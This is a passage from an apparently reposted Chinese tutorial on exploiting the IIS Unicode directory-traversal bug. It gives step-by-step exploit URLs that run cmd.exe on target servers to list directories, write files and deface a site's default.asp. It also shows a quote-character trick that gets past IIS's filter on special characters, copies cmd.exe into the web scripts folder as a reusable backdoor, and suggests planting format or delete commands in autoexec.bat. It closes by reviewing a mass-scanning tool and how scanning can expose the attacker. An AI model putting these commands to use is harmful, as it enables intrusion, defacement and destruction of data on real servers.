IIS UNICODE Bug

来源：互联网 作者：west263.com 时间：2008-04-16

西部数码-全国虚拟主机10强！40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

　　完全显示出来呀！同样，更有很多命令能够执行，大家能够试试，但是有些时间会很久，有些是不能执行的。解释号，在这里等于空格键，当然您也能够用空格键，用空格键运行后会转换为和�=/是同一道理的。对于名字超过8个字母的文档夹，假如我们想看里面的内容时就有点不同了比如说我们想看目标主机Program Files文档夹里面的内容时，应该这样输入
http://127.0.0.1/scripts/..�../winnt/system32/cmd.exe?/c dir c:＼progra~1
　　这里就不能用或来代替program和files间的空格。
要看aa bb文档夹，方法就是以下http://127.0.0.1/scripts/..�../winnt/system32/cmd.exe?/c dir e:＼aabb~1
aa bb=aabb~1
　　假如同目录下更有aab b文档夹，就用这样的代码看aab b文档夹里的内容http://127.0.0.1/scripts/..�../winnt/system32/cmd.exe?/c dir e:＼aabb~2
依此类推。
五。如何简单地修改目标主机的web页面
　　一般情况下，我们要修改目标主机的web文档，常用到的方法是利用echo回显、管道工具。
　　这些命令和管道工具的功能如下：
D:＼>echo/?
显示信息，或将命令响应打开或关上。
ECHO [ON | OFF]
ECHO [message]
仅键入 ECHO 而不加参数，能够显示当前的 ECHO 配置。
管道工具> >>的功能
"> >>" 是将命令产生的输出重新定向,比如写到某个文档或输出到打印机中.
>>产生的内容将追加进文档中,>则将原文档内容覆盖。
再看看cmd/?里面的部分内容：
　　请注意，假如字符串有引号，能够接受用命令分隔符 '&&' 隔开的多个命令。并且，由于兼容原因，/X 和 /E:ON 相同，/Y 和/E:OFF 相同，并且 /R 和 /C 相同。忽略任何其他命令选项。
　　假如指定了 /C 或 /K，命令选项后的命令行其余部分将作为命令行处理；在这种情况下，会使用下列逻辑处理引号字符("):
1. 假如符合下列任何条件，那么在命令行上的引号字符将被保留:
- 不带 /S 命令选项
- 整整两个引号字符
- 在两个引号字符之间没有特别字符，特别字符为下列中的
一个: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文档的名称。
2. 否则，老办法是，看第一个字符是否是个引号字符，假如是，舍去开头的字符并删除命令行上的最后一个引号字符，保留最后一个引号字符之后的文字：
从以上能够得到什么启示？
　　我们知道IIS加载程式检测到有CMD.EXE或COMMAND.COM串就要检测特别字符"&|(,;%<>"，假如发现有这些字符就会返回500错误，所以不能直接使用CMD.EEX加管道符等。
　　通过
http://x.x.x.x/scripts/..�../winnt/system32/cmd.exe?/c echo badboy > c:＼badboy.txt
　　我们能够看到提示　HTTP 500 - 内部服务器错误 Internet Explorer
　　经过反复测试，并从上面cmd内容的提示，我们能够会发现"引号字符是能够利用的，中联绿盟的yuange(袁哥)发布过关于这字符的公告，我想也许也是从上面的cmd/?信息中得到提示的，(纯属个人猜想，假如不是，请yuange不要见怪）。
　　我们要得到echo和>的结合使用，能够这样操作。
http://x.x.x.x/scripts/..�../winnt/system32/cmd".exe?/c echo badboy > c:＼badboy.txt
　　注意，和开始的命令的区别只在于cmd后面多了个"字符。运行后我们能够看到返回这样的结果：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
　　英文意思是　CGI错误具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：
　　实际上，我们已把badboy写入到c:＼badboy.txt文档里了。
　　利用这样的方法我们能够建立.bat .txt .asp .htm .html 等文档，这对于一个存在这漏洞的网站能够说是致命打击的开始，尤其是能写.bat文档假如我们在autoexe.bat里面加入format del等命令时，您想结果会如何？？
　　回到修改网站页面的问题来。
　　比如说想修改c:＼inetpub＼wwwroot＼default.asp
　　我们就能够这样在地址栏输入：
http://x.x.x.x/scripts/..�../winnt/system32/cmd".exe?/c echo your site has unicode bug > c:＼inetpub＼wwwroot＼default.asp
　　那么再看他的首页时，已被修改为
your site has unicode bug
　　事情就那么简单，任何一个普通人都能够通过地址栏对存在该漏洞的目标主机做最简单的HACK行为。
　　当然，假如为了方便输入，我们能够把cmd.exe改名为其他名字的文档，比如说c.exe
http://x.x.x.x/scripts/..�../winnt/system32/cmd.exe?/c copy c:＼winnt＼system32＼cmd.exe c:＼inetpub＼scripts＼c.exe
　　以后使用就能够直接
http://x.x.x.x/scripts/c.exe?/c echo badboy > c:＼badboy.txt
六．网络里可得到的一些UNICODE扫描程式的分析
1、简单易用的red.exe
操作平台：win9x、NT4、WIN2K
　　该软件能够在一些中文黑客软件收藏库里找到下载。red.exe是中国大陆的一位HACK技术爱好者Redp0wer用C 编写的针对某一IP段的NT主机UNICODE编码漏洞的命令行式扫描工具，该工具扫描速度快，扫描准确。能够在本地和远程NT肉机上执行扫描工作，并产生一个简单的扫描报告RED.txt （仅记录所扫描的IP段的NT主机的IP地址）。该软件对目标NT主机scripts、IISADMPWD、msadc、cgi-bin、_vti_bin目录都做UNICODE编码漏洞的测试。
　　假如您仅能在本地机上对某个IP段进行扫描，且是固定IP地址的用户，在使用该软件时，您须注意您的扫描行为实际上也把您自己暴露给对方。且容易被对方抓住把柄状告您有入侵行为。我们能够从事件查看器里发现执行的足迹
应用程式日志c:＼WINNT＼system32＼config＼AppEvent.Evt
安全日志C:＼WINNT＼System32＼config＼SecEvent.Evt
系统日志C:＼WINNT＼system32＼config＼SysEvent.Evt
　　我们分析该软件的源码能够看到：GET /%s/%s/winnt/system32/cmd.exe?/c%scopy%s%s:＼＼winnt＼＼system32＼＼cmd.exe%s%s＼＼red.exe HTTP/1.0＼n＼n假如从安全扫描工具来说，是不应该对所扫描的目标主机做任何文档的增加和修改。所以，在您还不知道怎么消除您的足迹和利用肉机来执行扫描时，最好不要利用这软件作为您的扫描工具。

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

[打印] [关闭]

相关文章

上一篇：驱除威胁—无线网络防黑完全攻略
下一篇： BBS3000漏洞

热点关注

IDC资讯虚拟主机域名注册托管租用 vps主机智能建站
网站运营建站经验策划盈利搜索优化网站推广免费资源
网站联盟联盟新闻联盟介绍联盟点评网赚技巧
行业资讯业界动态搜索引擎网络游戏门户动态电子商务广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器安全防护
软件技巧其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识网络协议网络安全网络管理组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD

版权所有西部数码(www.west263.com)
CopyRight (c) 2002~2007 west263.com all right reserved.
公司地址：四川成都市万和路90号天象大厦4楼　邮编：610031
电话总机：028-86263408 86263960 86264018 86267838 86262244 86263408
售前咨询：总机转201 202 203 204 205 206 207 208
售后服务：总机转211 212 213 214 217 218 晚上0点以后拔分机225